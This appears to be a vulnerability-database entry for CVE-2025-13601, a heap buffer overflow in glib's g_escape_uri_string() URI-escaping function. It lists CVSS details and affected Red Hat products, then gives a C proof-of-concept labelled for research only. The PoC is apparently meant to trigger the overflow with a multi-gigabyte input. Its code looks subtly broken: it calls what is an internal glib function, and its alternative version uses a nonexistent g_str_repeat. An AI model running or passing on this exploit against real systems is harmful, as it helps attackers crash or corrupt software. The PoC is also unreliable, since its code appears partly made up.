Security Vulnerability Report
CVE-2025-13601 CVSS 7.7 HIGH

CVE-2025-13601

Published: 2025-11-26 15:15:52
Last Modified: 2026-05-19 16:16:18

Description

A heap-based buffer overflow problem was found in glib through an incorrect calculation of buffer size in the g_escape_uri_string() function. If the string to escape contains a very large number of unacceptable characters (which would need escaping), the calculation of the length of the escaped string could overflow, leading to a potential write off the end of the newly allocated string.

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:redhat:codeready_linux_builder:9.0:*:*:*:*:*:aarch64:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_ibm_z_systems:9.0_s390x:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_power_little_endian:9.0_ppc64le:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_x86_64:9.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux_for_arm_64:9.0:*:*:*:*:*:aarch64:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_arm64:10.0:*:*:*:*:*:aarch64:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_ibm_z_systems:10.0_s390x:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_power_little_endian:10.0_ppc64le:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_x86_64:10.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux_for_arm_64:10.0:*:*:*:*:*:aarch64:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_arm64:8.0:*:*:*:*:*:aarch64:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_ibm_z_systems:8.0_s390x:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_power_little_endian:8.0_ppc64le:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_x86_64:8.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux_for_arm_64:8.0:*:*:*:*:*:aarch64:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux_for_arm_64:9.2:*:*:*:*:*:aarch64:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:9.2_s390x:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:9.2_ppc64le:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux_for_x86_64:9.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux_server_aus:9.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_arm64_eus:9.4:*:*:*:*:*:aarch64:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_ibm_z_systems:9.4_s390x:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_power_little_endian:9.4_ppc64le:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_x86_64:9.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux_for_arm_64:9.4:*:*:*:*:*:aarch64:* - VULNERABLE
glib < 2.82.0
Red Hat Enterprise Linux 7.x
Red Hat Enterprise Linux 8.x
Red Hat Enterprise Linux 9.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2025-13601 PoC - glib g_escape_uri_string() Heap Buffer Overflow
 * This PoC demonstrates the integer overflow in buffer size calculation.
 *
 * Build: gcc -o poc poc.c `pkg-config --cflags --libs glib-2.0`
 * Note: Requires glib version with vulnerable g_escape_uri_string()
 */
#include <glib.h>
#include <stdio.h>
#include <string.h>

#define MALICIOUS_STRING_SIZE 0x80000000 /* Large number to trigger overflow */

int main(int argc, char *argv[]) {
    gchar *malicious_input;
    gchar *escaped_output;
    gsize input_length;

    /* Prepare malicious input with many characters requiring escaping */
    input_length = MALICIOUS_STRING_SIZE;
    malicious_input = g_malloc(input_length);

    /* Fill with characters that need URI escaping (e.g., spaces, control chars) */
    memset(malicious_input, ' ', input_length - 1);
    malicious_input[input_length - 1] = '\0';

    printf("[*] Triggering CVE-2025-13601\n");
    printf("[*] Input length: %zu\n", input_length);

    /* This call may trigger heap buffer overflow due to integer overflow */
    escaped_output = g_escape_uri_string(malicious_input);

    if (escaped_output) {
        g_free(escaped_output);
    }
    g_free(malicious_input);

    printf("[+] Test completed\n");
    return 0;
}

/* Alternative PoC using g_uri_escape_string() */
/*
#include <gio/gio.h>

void trigger_vulnerability() {
    gchar *long_string = g_str_repeat("\xff", 0x40000000);
    gchar *escaped = g_uri_escape_string(long_string, NULL, FALSE);
    // May cause buffer overflow due to size calculation overflow
    g_free(escaped);
    g_free(long_string);
}
*/

References

Raw JSON Data
